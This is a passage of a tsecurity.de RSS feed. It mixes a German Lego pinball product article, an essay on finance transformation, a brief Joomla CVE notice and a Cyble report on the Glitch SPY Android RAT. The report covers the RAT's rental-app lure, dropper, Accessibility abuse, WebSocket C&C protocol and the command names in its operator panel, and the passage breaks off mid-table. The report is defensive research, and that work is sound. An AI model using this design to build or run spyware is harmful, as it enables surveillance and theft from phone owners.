<p>Lego hat ab heute einen <a href="https://click.linksynergy.com/deeplink?id=wEwyDeNfvlM&amp;mid=50641&amp;murl=https://www.lego.com/de-de/product/arcade-pinball-machine-11374&amp;subid=rss">Flipperautomaten</a> (auf Englisch: „Arcade Pinball Machine“) im Angebot. Dabei handelt es sich um ein neues Set (Nummer: 11374) aus der „Icons“-Reihe, das zum ersten Mal ein Lego-Modell in einen <strong>funktionierenden</strong> Flipper verwandelt.</p>



<p>Das Modell besteht aus 2.274 Teilen und ist mit mehreren klassischen Flipperfunktionen ausgestattet, darunter ein federbetriebener Kugelauswurf, Flipper, rotierende Hindernisse und Rampen. Das Ziel besteht darin, die Kugel durch ein vom Weltraum inspiriertes Spielfeld zu lenken und durch das Treffen verschiedener Ziele Punkte zu sammeln.</p>



<p>Das Thema dreht sich um einen klassischen Lego-Astronauten, der versucht, ein vermisstes Weltraumbaby wiederzufinden. Im Lieferumfang sind zwei Minifiguren enthalten – ein Astronaut und die Figur „Space Baby“.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a44b43e88bf6"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/11374_Lifestyle_Build_07.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Arcade Pinball Machine" class="wp-image-3169015" width="1200" height="750" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Lego</p></div>



<p>Lego schreibt in bester Marketingsprache:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Das Set vereint Kreativität, Technik und Nostalgie und bietet ein einzigartiges interaktives Bauerlebnis. Das fertige Modell wurde für Erwachsene und Fans klassischer Spiele entwickelt und ist von alten Spielautomaten inspiriert. Es eignet sich zudem hervorragend als Ausstellungsstück für zu Hause, im Büro oder im Spielzimmer.</p>
</blockquote>



<p>Lego ergänzt: “Bastler können ihr Erlebnis mit der LEGO Builder-App bereichern, die intuitive 3D-Bauanleitungen bietet und es den Nutzern ermöglicht, während des gesamten Bauvorgangs zu zoomen, zu drehen und ihren Fortschritt zu verfolgen”.</p>



<h2 class="wp-block-heading">Voll funktionsfähig</h2>



<p>Ist das Modell fertiggestellt, dient es nicht nur als Ausstellungsstück, sondern auch als voll funktionsfähiger Flipper. Lego beschreibt das Set als eine Kombination aus kreativem Bauen, Mechanik und nostalgischem Arcade-Feeling.</p>



<p>Der fertige Flipper ist 24 Zentimeter hoch, 38 Zentimeter lang und 28 Zentimeter breit.</p>



<h2 class="wp-block-heading">Verkaufsstart: Ab 1.7. für Lego-Insider, ab 4.7. für alle</h2>



<p>Der Flipperautomat alias „Lego Icons Arcade Pinball Machine“ erscheint am heutigen 1. Juli 2026 für Lego-Insiders-Mitglieder. Er ist ab dem 4. Juli dann für alle Interessierten erhältlich. Der Preis in Europa beträgt 209,99 Euro.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is an AI agent builder? And why should businesses consider using it?]]></title>
<description><![CDATA[A plain-English guide to what AI agent builders are, how they work, and why more businesses are turning to them to automate real work, not just chat.]]></description>
<link>https://tsecurity.de/de/3636729/it-nachrichten/what-is-an-ai-agent-builder-and-why-should-businesses-consider-using-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636729/it-nachrichten/what-is-an-ai-agent-builder-and-why-should-businesses-consider-using-it/</guid>
<pubDate>Tue, 30 Jun 2026 21:47:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A plain-English guide to what AI agent builders are, how they work, and why more businesses are turning to them to automate real work, not just chat.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to save $150 or more on your next PC build at Newegg right now]]></title>
<description><![CDATA[Newegg’s Combo Builder quietly stacks discounts across CPUs, motherboards, RAM, GPUs, and more — here’s how to use it to your advantage]]></description>
<link>https://tsecurity.de/de/3636365/it-nachrichten/how-to-save-150-or-more-on-your-next-pc-build-at-newegg-right-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636365/it-nachrichten/how-to-save-150-or-more-on-your-next-pc-build-at-newegg-right-now/</guid>
<pubDate>Tue, 30 Jun 2026 19:03:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Newegg’s Combo Builder quietly stacks discounts across CPUs, motherboards, RAM, GPUs, and more — here’s how to use it to your advantage]]></content:encoded>
</item>
<item>
<title><![CDATA[Live on the first floor while building the second]]></title>
<description><![CDATA[Every finance transformation conversation we have these days starts with AI. Clients arrive at the table with a list of agentic capabilities they want to deploy and an assumption that technology is the answer.



That assumption is half right. AI is one of the most consequential forces reshaping ...]]></description>
<link>https://tsecurity.de/de/3635185/it-nachrichten/live-on-the-first-floor-while-building-the-second/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635185/it-nachrichten/live-on-the-first-floor-while-building-the-second/</guid>
<pubDate>Tue, 30 Jun 2026 12:17:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Every finance transformation conversation we have these days starts with AI. Clients arrive at the table with a list of agentic capabilities they want to deploy and an assumption that technology is the answer.</p>



<p>That assumption is half right. AI is one of the most consequential forces reshaping finance in a generation, and the future-state operating models we are designing today look fundamentally different as a result. <a href="https://www.crosscountry-consulting.com/insights/blog/the-defining-leadership-moment-why-cfos-must-own-ai-strategy/" rel="nofollow">But AI alone is not a strategic finance roadmap</a>. The return comes from sequencing AI with the right process redesign, technology architecture and data foundation, with each piece compounding the next.</p>



<p>For decades, CFOs treated transformation like a renovation, managing tasks room by room. They executed separate projects to update the close, replace an ERP and layer better reporting on the same operating model. AI changes that blueprint. For the first time, we can take the house down to the studs and rebuild around capabilities that did not exist three years ago. That is a different kind of project, and it requires a different kind of leader.</p>



<p>AI has done something that previous waves of transformation never managed to do. It has brought the right stakeholders into the conversation and forced finance and IT to address the same problem simultaneously. That side effect alone is reshaping how the next phase of transformation gets built.</p>



<p>This is the part of the conversation IT leaders need to understand.</p>



<h2 class="wp-block-heading">What the AI conversation has actually done</h2>



<p>For most of the last decade, finance transformation was launched in response to a single trigger. A cost-out program. A post-acquisition integration. An ERP that aged out. The CFO owned the initiative, the CIO got pulled in to handle the technology and the rest of the business found out when the new system went live.</p>



<p>The AI moment has changed that pattern and forced a new conversation. When you are taking the house down to the studs rather than swapping out fixtures, the work cannot be done by Finance or IT alone. <a href="https://www.crosscountry-consulting.com/enterprise-digital-transformation-study/" rel="nofollow">Stakeholder alignment becomes a precondition for the rebuild</a>, not a nice-to-have. AI is the attraction that pulls everyone into the room.</p>



<p>When a client walks in asking about agentic finance, the CFO, CIO and heads of accounting, FP&amp;A and controllership all show up for the same assessment. Leaders who have historically run parallel agendas now talk about the same problem at the same time. By the time we get to solution design, the cross-functional alignment that used to require months has already happened. Issues get raised early. The transformation moves faster because everyone agreed on the destination before we picked the route.</p>



<p>Maybe we can thank AI for bringing people together who otherwise wouldn’t have been collaborating. That is the reason the next phase of finance transformation looks structurally different from the last.</p>



<h2 class="wp-block-heading">The roadmap and what’s missing</h2>



<p>A strategic finance roadmap is not a project plan. It is more like an architect’s drawings, providing a multi-year design that connects business strategy to a future-state operating model, sequenced so each step compounds rather than starts over.</p>



<p>Every roadmap has a North Star. That future-state vision almost always has an AI component. A multi-agent solution orchestrated on a platform. Continuous close. Predictive FP&amp;A. Real-time controls. Humans in the Loop. A streamlined org chart. That vision, eventually, becomes the destination.</p>



<p>But the destination is not today. What matters today is that the work between the as-is and future-state is cumulative, not throwaway. The data foundation organized for one transformation becomes the foundation for the next. Process improvements made now will accelerate the AI capabilities deployed two years from now.</p>



<p>You do not need an architect for a renovation. You hire a contractor, hand them a task list and inspect the results. You need an architect when you take the house down to the studs. The role most transformation programs are missing right now is not another builder. There are plenty of developers, system implementers and business integrators in any given program. What is missing is the architect.</p>



<p>The architect designs how the parts come together before anyone starts building. That work runs side by side with the client, connecting the dots between the technology, the problems, the data and the functions inside Finance and IT. The architect’s job is to create the vision and the blueprint and to translate between groups that do not naturally speak the same language. Done well, the result is a structure that is fundamentally sound and built to expand as the client’s appetite grows. Done poorly or skipped, the result is a house that cannot accommodate what comes next.</p>



<h2 class="wp-block-heading">Live on the 1st floor while you build the 2nd… and 3rd</h2>



<p>The traditional transformation pitch promises ROI at the end. Wait three years and the numbers will look great. That pitch is structurally fragile, and every CIO who has watched a transformation <a href="https://www.mckinsey.com/capabilities/mckinsey-digital/our-insights/agile-in-enterprise-resource-planning-a-myth-no-more" rel="nofollow">budget get cut in year two knows why</a>.</p>



<p>Stakeholder fatigue is real. Budget uncertainty is real. In private equity-backed companies, the three-to-five-year hold period is real. Any program that has not produced measurable value in the first phase loses political support before the second phase is built.</p>



<p>The architectural alternative is to design the program so the first floor is occupied while the second and third floors are still being completed. The first process redesign produces value while the next is being scoped. The first technology deployment generates a return while the next is being implemented. The roadmap is not a march toward a distant payoff. It is a sequence of compounding wins.</p>



<p>The materiality of the return matters more than the size. A small process improvement or quick win that delivers a meaningful percentage gain in week ten is worth more than a large transformation that promises a bigger gain in year three. Quick wins prove that the blueprint is working. That proof builds the confidence stakeholders need to fund the next phase and the one after that. Investors want immediate ROI. Boards want immediate ROI. The strategic finance roadmap should be designed to deliver it.</p>



<h2 class="wp-block-heading">Data in every room</h2>



<p>Picture data as the electricity and water in a building: every room needs it, and the pipes and wires that carry it are what make the structure livable. Consolidating, warehousing and improving data quality is how you run those lines. It strengthens every element of the roadmap, not just the AI.</p>



<p>That has implications for how the stack gets selected. Most clients end up with an ecosystem rather than a single platform. ERP, EPM, close management, procurement, reporting and an emerging set of agentic capabilities, all integrated against a shared data foundation. The boundaries between those tools matter less than the data architecture that connects them.</p>



<p>It also has implications for what the CIO needs to be doing right now, even on transformations not yet formally launched. The data work pays dividends regardless of which solutions eventually get built. Cybersecurity, controls and business continuity are not bolted on at the end. They are design constraints embedded in the architecture from day one. SOX compliance is easier to build in than to retrofit, as is every other control discipline that lands on the CIO’s desk.</p>



<h2 class="wp-block-heading">The roadmap in 5 years</h2>



<p>The most concrete way to think about where this is going is to look at the org chart.</p>



<p>The finance org chart five years from now is not going to look like the org chart today. Where there used to be five controllers, there may be one human controller and three E-controllers, with agents sitting alongside them on the chart. The remaining human roles will be split between onshore and offshore in ways that look unfamiliar from where we sit now. The balance and location of every component will shift.</p>



<p>The strategic finance roadmap is the artifact that builds toward that end state, and the roadmap itself will evolve as the work progresses. Not a destination, but a continuous design exercise.</p>



<p>AI is rebuilding finance from the studs up. The strategic finance roadmap is how we make sure the new house is structurally sound, produces returns from the first floor and reflects the vision and the priorities of the people who will live in it. That work belongs to the CFO and the CIO together, or it does not become livable.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-56290 | JoomlaCK Page Builder CK Extension 1.0-3.6.0 on Joomla access control (EUVD-2026-40121)]]></title>
<description><![CDATA[A vulnerability has been found in JoomlaCK Page Builder CK Extension 1.0-3.6.0 on Joomla and classified as critical. This affects an unknown part. This manipulation causes improper access controls.

The identification of this vulnerability is CVE-2026-56290. It is possible to initiate the attack ...]]></description>
<link>https://tsecurity.de/de/3635156/sicherheitsluecken/cve-2026-56290-joomlack-page-builder-ck-extension-10-360-on-joomla-access-control-euvd-2026-40121/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635156/sicherheitsluecken/cve-2026-56290-joomlack-page-builder-ck-extension-10-360-on-joomla-access-control-euvd-2026-40121/</guid>
<pubDate>Tue, 30 Jun 2026 12:09:22 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/joomlack:page_builder_ck_extension">JoomlaCK Page Builder CK Extension 1.0-3.6.0</a> on Joomla and classified as <a href="https://vuldb.com/kb/risk">critical</a>. This affects an unknown part. This manipulation causes improper access controls.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-56290">CVE-2026-56290</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Glitch SPY: An Emerging Android RAT Distributed Through a Fake Polish Rental App]]></title>
<description><![CDATA[Executive Summary




Cyble Research and Intelligence Labs identified an emerging Android malware family tracked as Glitch SPY, distributed through a fraudulent Polish apartment and house rental platform designed to lure users into downloading an Android APK.


Based on the Polish-language lure a...]]></description>
<link>https://tsecurity.de/de/3635150/it-security-nachrichten/glitch-spy-an-emerging-android-rat-distributed-through-a-fake-polish-rental-app/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635150/it-security-nachrichten/glitch-spy-an-emerging-android-rat-distributed-through-a-fake-polish-rental-app/</guid>
<pubDate>Tue, 30 Jun 2026 12:08:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1200" height="600" src="https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Glitch SPY" decoding="async" srcset="https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6.jpg 1200w, https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6-300x150.jpg 300w, https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6-1024x512.jpg 1024w, https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6-768x384.jpg 768w" sizes="(max-width: 1200px) 100vw, 1200px" title="Glitch SPY: An Emerging Android RAT Distributed Through a Fake Polish Rental App 1"></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Executive Summary</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Cyble Research and Intelligence Labs identified an emerging Android malware family tracked as <strong>Glitch SPY</strong>, distributed through a fraudulent Polish apartment and house rental platform designed to lure users into downloading an Android APK.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Based on the Polish-language lure and rental-themed distribution website, the activity appears to be Poland-focused, targeting users in Poland or Polish expats.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The downloaded application functions as a dropper and installs the Glitch SPY payload after convincing the user to allow installation from unknown sources. Glitch SPY prompts the victim to enable Android Accessibility Service, which it abuses to automate permission grants, interact with the device UI, extract visible screen content, perform gestures, support remote input, and enable further post-infection activity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY maintains a persistent WebSocket channel to its C&amp;C server and supports over 70 commands spanning live screen streaming and remote control, screenshot and screen-reader capture, SMS, contact, call log, and location theft, camera and microphone surveillance, keylogging, file management, and shell execution.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Beyond standard surveillance, it includes a crypto-clipper that swaps copied wallet addresses across multiple blockchain formats, file encryption/decryption routines, device-unlock and credential-capture logic, and a hidden remote-browser capability that lets attackers conduct web-based account takeover from the victim's own device and IP.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The Builder module lets operators set a custom app name, package ID, icon, and decoy URL per payload, indicating the platform is designed for redistribution across multiple campaigns, not a single targeted operation.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121430,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-1-%E2%80%93-Glitch-SPY-Attack-Chain-1024x601.png" alt="Figure 1 – Glitch SPY Attack Chain" class="wp-image-121430"><figcaption class="wp-element-caption"><em>Figure 1 – Glitch SPY Attack Chain</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Key Takeaways<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Glitch SPY is an emerging Android RAT/builder platform identified through branding observed on an exposed C&amp;C admin panel.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The malware is distributed via a fake Polish rental app website that encourages users to download and install an APK outside official app stores.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The downloaded application is the Brokewell Android Loader, which acts as a dropper and deploys the Glitch SPY payload.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Glitch SPY heavily abuses the Android Accessibility Service to auto-grant permissions, extract on-screen content, perform taps and gestures, and operate the device with minimal user interaction.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Glitch SPY supports extensive surveillance and theft capabilities, including screen streaming, screenshots, keylogging, SMS theft, contact and call log collection, file access, audio and camera capture, clipboard monitoring, location tracking, and remote browser control.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The malware includes a crypto-clipper that swaps copied wallet addresses across multiple formats (ETH/EVM, TRON, Bitcoin legacy, and Bech32) with attacker-controlled addresses, directly targeting cryptocurrency users.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The exposed Glitch SPY panel confirms the presence of modules such as Agents, Viewer, Builder, Cryptor, Dropper, Settings, and Payloads.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The Builder module indicates that threat actors can generate customized Android payloads with configurable names, package IDs, icons, feature modules, decoy WebView URLs, and optional Telegram alerting.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Overview<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><a href="https://cyble.com/resources/research-reports/">Cyble Research and Intelligence Labs</a> identified an emerging Android malware family tracked as <strong>Glitch SPY</strong>, based on branding observed on an exposed command-and-control (C&amp;C) admin panel. The <a href="https://cyble.com/knowledge-hub/what-is-malware/">malware</a> was distributed via the suspicious domain tutaj-dompl[.]com, which appears to be a Polish apartment and house rental platform.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The website advertises verified apartments, viewing reservations, direct contact with property owners, and a simplified rental process without broker commissions. Its primary objective is to encourage users to download an Android APK to reserve apartment viewings, check availability, save listings, and receive confirmation updates.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121434,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-2-Fake-Tutaj-Dom-distribution-website.png" alt="" class="wp-image-121434"><figcaption class="wp-element-caption"><em>Figure 2 - Fake Tutaj Dom distribution website</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The lure is socially plausible, as users searching for rental properties may install a dedicated application to secure viewing slots or communicate with property owners. Based on the Polish-language lure and rental-themed distribution website, the activity appears to be Poland-focused, particularly targeting users searching for rental properties in Poland.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Once installed, the application displays the rental-themed website as a decoy interface, while the Glitch SPY payload runs in the background and initiates malicious activity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>During analysis, the malware was observed communicating with the C&amp;C domain sportypointsrewards[.]com. Accessing the C&amp;C infrastructure revealed an admin login panel branded as Glitch SPY, which prompted for a username and password. We also identified an additional Glitch SPY admin panel URL gich[.]etherraffleexchange[.]us.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>However, no communicating APK associated with that second panel has been recovered at the time of analysis.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121437,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-3-Glitch-SPY-admin-login-panel.png" alt="" class="wp-image-121437"><figcaption class="wp-element-caption"><em>Figure 3 - Glitch SPY admin login panel</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Before authentication, the admin panel exposed a partial view of the Glitch SPY dashboard, revealing multiple modules, including:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121438,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-4-%E2%80%93-Glitch-SPY-dashboard.png" alt="Figure 4 – Glitch SPY dashboard" class="wp-image-121438"><figcaption class="wp-element-caption"><em>Figure 4 – Glitch SPY dashboard</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>The <strong>Agents</strong> module appears to be designed to list infected devices and search for victims by name, agent ID, device details, or IP address.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Viewer</strong> module provides live screen viewing and remote-control operations, including remote input, pattern unlock, screen streaming, screenshots, screen-reader extraction, Android navigation controls, camera access, audio capture, keylogging, clipper operations, file management, SMS access, contacts, call logs, location tracking, installed applications, device accounts, system information, remote browser interaction, shell access, permission prompting, Device Admin control, biometric prompt suppression, app hiding, and self-uninstall functionality.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Builder</strong> module allows TA to configure and compile Android payloads using Gradle on the server. Configurable options include the application name, package name, launcher icon, version information, foreground notification text, decoy WebView URL, feature modules, Device Admin activation, and Telegram alert settings.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Cryptor</strong> module is present but marked as “Coming soon,” suggesting planned support for APK repacking, fresh signing, payload noise under assets, and mirror obfuscation layers while preserving installability.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Dropper</strong> module appears to allow TA to wrap a generated payload inside a separate dropper APK, supporting staged delivery.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Payloads</strong> module appears to store APKs generated by the Builder and Dropper modules.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Once the user installs the downloaded application, it functions as a dropper and presents a fake update-style screen to guide the victim through the required installation and permission steps. The dropper first attempts to convince the user to allow installation from unknown sources. After this permission is granted, the Glitch SPY payload is installed on the device.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After installation, Glitch SPY prompts the user to enable the Android Accessibility Service. Once Accessibility access is enabled, the malware abuses this capability to automate permission grants and continue its post-installation activity with minimal user interaction.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This allows Glitch SPY to obtain the permissions required for remote control, screen capture, keylogging, SMS theft, file access, camera and microphone surveillance, clipboard monitoring, and other intrusive operations.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>A detailed technical analysis of these capabilities is provided in the following section.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Technical Analysis</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The application downloaded from the fraudulent website was identified as the Brokewell Android Loader, based on its package naming pattern and its use of techniques designed to circumvent Android permission restrictions. CRIL first documented the Brokewell Android Loader and the Brokewell Banking Trojan in April 2024.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After installation, the loader presents a fake update-themed screen and prompts the user to allow installation of applications from unknown sources. Once the user grants this permission, the loader installs the Glitch SPY payload on the device.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121441,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-5-Glitch-SPY-installation-activity.png" alt="" class="wp-image-121441"><figcaption class="wp-element-caption"><em>Figure 5 - Glitch SPY installation activity</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Abuse of Android Accessibility Service</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Following installation, Glitch SPY immediately attempts to obtain Android Accessibility Service access, which is required for several of its core capabilities. After the user enables the Accessibility Service, the malware abuses this permission to observe UI elements, interact with on-screen content, perform gestures, click buttons, extract visible text, and automate permission approval flows with limited user interaction.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The malware includes logic for remote tap and swipe actions, screen-reader text extraction, gesture dispatch, automated permission granting, keyguard interaction, PIN/password entry, pattern unlock assistance, biometric prompt handling, and force-stop or uninstall interruption. This makes Accessibility the primary mechanism Glitch SPY uses to support TA-driven control of the infected device and to continue post-installation activity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Command and Control</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After installation, Glitch SPY starts its core C&amp;C service and establishes a persistent WebSocket-based communication channel with the command-and-control server. The malware Glitch SPY refers to the device as an agent, assigns an agent_id to the infected device, collects device metadata, and sends an initial hello message along with deviceInfo to register the infected device with the C&amp;C panel. The server responds with a hello_ack, after which the implant maintains connectivity using heartbeat and ping logic.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The implant executes the requested action locally and returns the output through response messages such as command_result, screen_frame, sms_data, contacts_data, file_list, and browser_command_result.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The complete list of commands is provided below.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Command</strong></td>
<td><strong>Feature</strong></td>
</tr>
<tr>
<td>request_screen_stream</td>
<td>Starts live screen streaming from the infected device to the C&amp;C panel.</td>
</tr>
<tr>
<td>stop_screen_stream</td>
<td>Stops the active screen-streaming session.</td>
</tr>
<tr>
<td>request_screenshot</td>
<td>Captures a screenshot of the infected device screen and returns it to the C&amp;C.</td>
</tr>
<tr>
<td>request_screen_reader_text</td>
<td>Uses Accessibility to extract visible on-screen text and send it to the C&amp;C Server.</td>
</tr>
<tr>
<td>request_sms</td>
<td>Collects SMS messages from the infected device.</td>
</tr>
